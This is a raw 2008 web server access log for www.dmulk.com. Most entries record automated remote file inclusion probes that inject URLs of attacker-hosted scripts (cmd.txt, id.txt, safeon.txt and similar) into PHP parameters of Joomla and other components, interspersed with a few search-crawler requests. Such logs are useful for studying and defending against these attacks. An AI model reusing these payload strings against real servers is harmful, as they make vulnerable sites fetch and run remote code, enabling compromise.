74.6.24.49 - - [22/Feb/2008:08:39:47 -0800] "GET /retreat1/webcam/ HTTP/1.0" 200 786184 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.82.132.50 - - [22/Feb/2008:08:40:49 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.82.132.50 - - [22/Feb/2008:08:40:49 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.218.51.165 - - [22/Feb/2008:08:41:40 -0800] "GET /logs/access_080131.log/scanhttp://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.223.16.102 - - [22/Feb/2008:08:41:44 -0800] "GET /index1.php?site=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.218.51.165 - - [22/Feb/2008:08:41:45 -0800] "GET /scanhttp://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.99.250 - - [22/Feb/2008:08:41:55 -0800] "GET /logs/access_080201.log/claroline/tracking/userLog.php?rootSys=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.218.51.165 - - [22/Feb/2008:08:41:56 -0800] "GET /logs/scanhttp://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.99.250 - - [22/Feb/2008:08:42:01 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.99.250 - - [22/Feb/2008:08:42:02 -0800] "GET /logs/claroline/tracking/userLog.php?rootSys=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:42:11 -0800] "GET /logs/access_080126.log/include/status_top_x.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:42:12 -0800] "GET /include/status_top_x.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:42:12 -0800] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.72.15 - - [22/Feb/2008:08:45:20 -0800] "GET /logs/access_080122.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.72.15 - - [22/Feb/2008:08:45:25 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.72.15 - - [22/Feb/2008:08:45:25 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.123.27.136 - - [22/Feb/2008:08:45:39 -0800] "GET /logs/access_080122.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [22/Feb/2008:08:45:41 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [22/Feb/2008:08:45:42 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:46:07 -0800] "GET /logs/access_080126.log/include/status.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:46:08 -0800] "GET /include/status.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:46:08 -0800] "GET /logs/include/status.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.51.176 - - [22/Feb/2008:08:46:11 -0800] "GET //init_basic.php?GALLERY_BASEDIR=http://www.bjlfansite.be/site/media/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.60.94.230 - - [22/Feb/2008:08:46:34 -0800] "GET //?CONFIG_EXT[ADMIN_PATH]=http://220.134.235.165/modules/xoopsgallery/cache/albums/..../o?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.230 - - [22/Feb/2008:08:46:42 -0800] "GET /logs/access_071222.log//?CONFIG_EXT[ADMIN_PATH]=http://220.134.235.165/modules/xoopsgallery/cache/albums/..../o?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.230 - - [22/Feb/2008:08:46:44 -0800] "GET //?CONFIG_EXT[ADMIN_PATH]=http://220.134.235.165/modules/xoopsgallery/cache/albums/..../o?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.230 - - [22/Feb/2008:08:46:45 -0800] "GET /logs//?CONFIG_EXT[ADMIN_PATH]=http://220.134.235.165/modules/xoopsgallery/cache/albums/..../o?? HTTP/1.1" 200 35692 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.231 - - [22/Feb/2008:08:46:52 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.82.132.50 - - [22/Feb/2008:08:47:01 -0800] "GET /logs/access_080131.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.176.201 - - [22/Feb/2008:08:47:12 -0800] "GET /status/doc?pattern=*//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
64.34.176.201 - - [22/Feb/2008:08:47:12 -0800] "GET /logs/status/doc?pattern=*//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
218.188.2.141 - - [22/Feb/2008:08:47:40 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:48:36 -0800] "GET /logs/access_080126.log/include/status.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:48:37 -0800] "GET /include/status.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:48:37 -0800] "GET /logs/include/status.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.222.13.22 - - [22/Feb/2008:08:48:56 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.222.13.22 - - [22/Feb/2008:08:48:56 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.222.13.22 - - [22/Feb/2008:08:48:56 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.222.13.22 - - [22/Feb/2008:08:49:09 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.222.13.22 - - [22/Feb/2008:08:49:09 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.222.13.22 - - [22/Feb/2008:08:49:10 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.123.27.136 - - [22/Feb/2008:08:49:19 -0800] "GET /logs/access_071225.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.223.16.102 - - [22/Feb/2008:08:49:22 -0800] "GET /logs/access_080103.log/index1.php?site=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.223.16.102 - - [22/Feb/2008:08:49:29 -0800] "GET /logs/index1.php?site=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.17.14.194 - - [22/Feb/2008:08:49:57 -0800] "GET /logs/access_080121.log//components/com_forum/download.php?phpbb_root_path=www.hotoilstocks.com/components/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.17.14.194 - - [22/Feb/2008:08:49:57 -0800] "GET //components/com_forum/download.php?phpbb_root_path=www.hotoilstocks.com/components/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.17.14.194 - - [22/Feb/2008:08:49:58 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=www.hotoilstocks.com/components/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.72.15 - - [22/Feb/2008:08:50:03 -0800] "GET /logs/access_071225.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.105.76 - - [22/Feb/2008:08:50:53 -0800] "GET /status/doc?pattern=*//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.248.204 - - [22/Feb/2008:08:51:10 -0800] "GET /main.php?appserv_root=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.222.13.22 - - [22/Feb/2008:08:51:18 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.166.35.71 - - [22/Feb/2008:08:51:19 -0800] "GET /index.php?seccion=http://www.zuuniimedee.mn//modules/My_eGallery/data/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.242.208.120 - - [22/Feb/2008:08:51:22 -0800] "GET /main.php?appserv_root=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.222.13.22 - - [22/Feb/2008:08:51:23 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.166.35.71 - - [22/Feb/2008:08:51:23 -0800] "GET /logs/index.php?seccion=http://www.zuuniimedee.mn//modules/My_eGallery/data/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.215.12.82 - - [22/Feb/2008:08:51:28 -0800] "GET /logs/access_080211.log/scanhttp://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.188.2.141 - - [22/Feb/2008:08:51:37 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.jasungman.com/57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.248.204 - - [22/Feb/2008:08:52:21 -0800] "GET /status/doc?pattern=*//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.92.122.250 - - [22/Feb/2008:08:52:22 -0800] "GET /main.php?appserv_root=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.140 - - [22/Feb/2008:08:52:50 -0800] "GET /logs/index.php?pilih=http://www.susjed.com/josso/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.185.237.140 - - [22/Feb/2008:08:52:56 -0800] "GET /index.php?pilih=http://www.susjed.com/josso/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
204.92.122.250 - - [22/Feb/2008:08:52:59 -0800] "GET /status/doc?pattern=*//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.160.11.72 - - [22/Feb/2008:08:53:39 -0800] "GET /index.php?seccion=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.80.254 - - [22/Feb/2008:08:54:17 -0800] "GET //plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
85.214.80.254 - - [22/Feb/2008:08:54:17 -0800] "GET /logs//plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
83.226.103.41 - - [22/Feb/2008:08:54:44 -0800] "GET /logs/access_080131.log//Neos_Chronos/header.php?base_folder=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.226.103.41 - - [22/Feb/2008:08:54:45 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.226.103.41 - - [22/Feb/2008:08:54:45 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:54:53 -0800] "GET /logs/access_080126.log/include/libchart-1.1/libchart.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:54:54 -0800] "GET /include/libchart-1.1/libchart.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:54:54 -0800] "GET /logs/include/libchart-1.1/libchart.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.218.51.165 - - [22/Feb/2008:08:55:04 -0800] "GET /logs/access_080211.log/scanhttp://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.23.150 - - [22/Feb/2008:08:55:18 -0800] "GET /tmp/ HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.218.51.165 - - [22/Feb/2008:08:55:58 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.218.51.165 - - [22/Feb/2008:08:55:59 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.218.51.165 - - [22/Feb/2008:08:56:02 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.226.103.41 - - [22/Feb/2008:08:56:12 -0800] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.218.51.165 - - [22/Feb/2008:08:56:16 -0800] "GET /scanhttp://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.188.29.73 - - [22/Feb/2008:08:56:46 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.77 - - [22/Feb/2008:08:57:34 -0800] "GET /logs/access_071130.log HTTP/1.0" 200 58566 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.80 - - [22/Feb/2008:08:57:47 -0800] "GET /tmp/sess_ab61b27b0df40fc681a013292d548fb5 HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.223.16.102 - - [22/Feb/2008:08:58:14 -0800] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.223.16.102 - - [22/Feb/2008:08:58:17 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.25.34 - - [22/Feb/2008:08:58:27 -0800] "GET /tmp/?S=A HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:08:58:36 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:08:58:37 -0800] "GET /logs/access_071230.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
81.191.43.42 - - [22/Feb/2008:08:58:41 -0800] "GET /logs/access_080131.log//Neos_Chronos/header.php?base_folder=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.191.43.42 - - [22/Feb/2008:08:58:41 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.191.43.42 - - [22/Feb/2008:08:58:42 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.17.14.194 - - [22/Feb/2008:08:59:06 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=www.hotoilstocks.com/components/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.17.14.194 - - [22/Feb/2008:08:59:06 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=www.hotoilstocks.com/components/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.17.14.194 - - [22/Feb/2008:08:59:08 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=www.hotoilstocks.com/components/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.195.43.1 - - [22/Feb/2008:08:59:29 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.team-xecuter.com/forums//impex/config/exp667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
118.45.190.173 - - [22/Feb/2008:08:59:55 -0800] "GET /logs/access_080120.log//components/com_performs/performs.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.160.11.72 - - [22/Feb/2008:09:00:14 -0800] "GET /logs/access_080108.log/index.php?seccion=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.11.72 - - [22/Feb/2008:09:00:14 -0800] "GET /index.php?seccion=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.11.72 - - [22/Feb/2008:09:00:15 -0800] "GET /logs/index.php?seccion=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.191.43.42 - - [22/Feb/2008:09:00:21 -0800] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.35.229.7 - - [22/Feb/2008:09:00:29 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.35.229.7 - - [22/Feb/2008:09:00:29 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.35.229.7 - - [22/Feb/2008:09:00:30 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.254.214.3 - - [22/Feb/2008:09:00:37 -0800] "GET /logs/access.log/modules/agendax/addevent.inc.php?agendax_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [22/Feb/2008:09:00:38 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [22/Feb/2008:09:00:38 -0800] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.52.236.0 - - [22/Feb/2008:09:00:39 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.52.236.0 - - [22/Feb/2008:09:00:40 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.52.236.0 - - [22/Feb/2008:09:00:41 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.223.16.102 - - [22/Feb/2008:09:00:46 -0800] "GET /logs/access_080123.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.20.208 - - [22/Feb/2008:09:01:46 -0800] "GET /logs/access_080117.log HTTP/1.0" 200 670488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.218.51.165 - - [22/Feb/2008:09:02:01 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
